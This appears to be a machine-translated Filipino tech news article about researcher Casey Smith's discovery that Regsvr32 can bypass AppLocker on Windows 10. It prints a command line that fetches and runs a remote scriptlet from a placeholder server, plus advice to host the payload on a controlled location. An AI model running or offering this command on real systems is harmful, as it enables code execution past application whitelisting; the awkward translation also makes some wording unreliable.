Ang isang mananaliksik mula sa Colorado na napupunta sa pangalan, Casey Smith, ay nalaman na ang Regsvr32 ay maaaring magamit upang i-bypass ang AppLocker sa Windows 10, at ito ay isang malaking problema para sa mga gumagamit ng computer, lalo na sa mga nasa kapaligiran ng negosyo.

Ang AppLocker ay unang ipinakilala sa Windows 7 at Windows Server 2008 R2. Ito ay dinisenyo upang pahintulutan ang mga administrador na tukuyin kung aling grupo o mga gumagamit ang maaaring samantalahin ang ilan o lahat ng mga aplikasyon batay sa natatanging pagkakakilanlan ng mga file. Kung ikaw ay isang taong may posibilidad na gumamit ng AppLocker, dapat itong karaniwang kaalaman na maaari itong magamit upang lumikha ng ilang mga patakaran upang payagan ang mga application na patakbuhin o ihinto ang mga ito sa kanilang mga track.

Para sa mga hindi namamalayan, maaaring magamit ang Regvr32 upang magrehistro at iregular ang mga DLL. Ito ay hindi isang tool na pag-click na nakikita bilang ito ay isang utos na linya ng utos, kaya ang mga advanced na gumagamit ng computer lamang ang dapat maghangad na samantalahin kung ano ang mag-alok nito.

Naiintindihan namin na sa pamamagitan ng paggamit ng pamamaraang ito, hindi nito binabago ang pagpapatala ng system ng computer, na nagpapahirap sa mga admin na malaman kung may mga pagbabago na nagawa.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

"Ang kamangha-manghang bagay dito ay ang regsvr32 ay nakaalam na sa proxy, gumagamit ng TLS, sumusunod sa mga pag-redirect, atbp … At … Nahulaan mo ang isang naka-sign, default na MS binary. Kaya, ang kailangan mo lang gawin ay i-host ang iyong.sct file sa isang lokasyon na kinokontrol mo, ”sulat ni Smith.

Ang diskarteng nasa itaas ay hindi nangangailangan ng mga pribilehiyo sa pangangasiwa at hindi nito binabago ang pagpapatala. Bukod dito, ang mga script ay maaaring tawagan sa parehong HTTP o HTTPS. Sa ngayon, ang Microsoft ay hindi nagpakawala ng isang patch para sa maliit na problema, kaya ang tanging pagpipilian sa puntong ito ay upang harangan ang Regsvr32 sa pamamagitan ng Windows Firewall.

Kapansin-pansin ang sapat, ang higanteng software ay hindi pa tumugon tungkol sa isyung pangseguridad na kinakaharap ng operating system nito. Ngayon na ito ay nasa bukas na, inaasahan naming makarinig ng isang bagay mula sa kumpanya kasama ang mga pag-uusap ng isang hinaharap na patch.